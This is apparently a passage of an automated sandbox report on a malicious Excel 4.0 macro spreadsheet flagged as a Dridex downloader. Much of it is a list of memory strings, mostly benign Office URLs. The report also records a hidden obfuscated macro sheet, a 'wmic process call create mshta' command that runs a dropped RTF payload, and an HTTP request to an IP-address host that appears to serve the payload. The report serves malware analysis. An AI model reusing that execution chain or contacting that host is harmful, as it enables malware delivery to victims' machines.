      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.coma
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.come
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comlg
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://tasks.office.com
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.comst
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.htmlr
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devicesKO
      Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://web.microsoftstream.com/video//
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosh
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630046251.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345579955.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429282809.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348419025.0000000012F2A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.536441529.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347932958.0000000012F22000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433606109.0000000012F14000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345920900.0000000012F2A000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msd
      Source: global trafficHTTP traffic detected: GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: pissoffHost: 157.230.250.107:8080

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\SKZbt.rtf, type: DROPPED

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: 08676789691.xlsmMacro extractor: Sheet: Macro1 contains: mshta
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 08676789691.xlsmInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: 08676789691.xlsmInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: EXCEL.EXE, 00000000.00000003.536566000.00000000130A9000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\SKZbt.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Defaultre=::=::\=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=LIJDSFKUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsE=userUSERPROFILE=C:\Users\userwindir=C:\Windows:\Users\userwindir=C:\WindowsPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows71USERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsC:\Users\userwindir=C:\Windows
      Found obfuscated Excel 4.0 MacroShow sources
      Source: 08676789691.xlsmMacro extractor: Sheet: Macro1 high usage of CHAR() function: 15
      Source: 08676789691.xlsmMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: 08676789691.xlsmReversingLabs: Detection: 15%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\SKZbt.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\SKZbt.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\SKZbt.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\SKZbt.rtfJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2596:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{77711178-B0E5-4820-B553-C75559596DF4} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/8@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 08676789691.xlsmInitial sample: OLE zip file path = xl/media/image1.png
      Source: 08676789691.xlsmInitial sample: OLE zip file path = docProps/custom.xml
      Source: 72530000.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: skzbt.rtfJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: cmd line: skzbt.rtfJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 2712Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: EXCEL.EXE, 00000000.00000003.428798155.000000000F3F3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.432602253.000000000F421000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.428829539.000000000F421000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.627235109.000000000F421000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429646756.000000000F3F3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.432498654.000000000F3F3000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.627181251.000000000F3F3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000003.544233598.000001E529D14000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.619578044.000001ED2C934000.00000004.00000001.sdmp, mshta.exe, 00000015.00000003.544266956.000001ED2C92F000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616950624.000001E529D13000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: EXCEL.EXE, 00000000.00000002.626127610.000000000D685000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp@
      Source: EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\SKZbt.rtfJump to behavior
      Source: Yara matchFile source: app.xml, type: SAMPLE
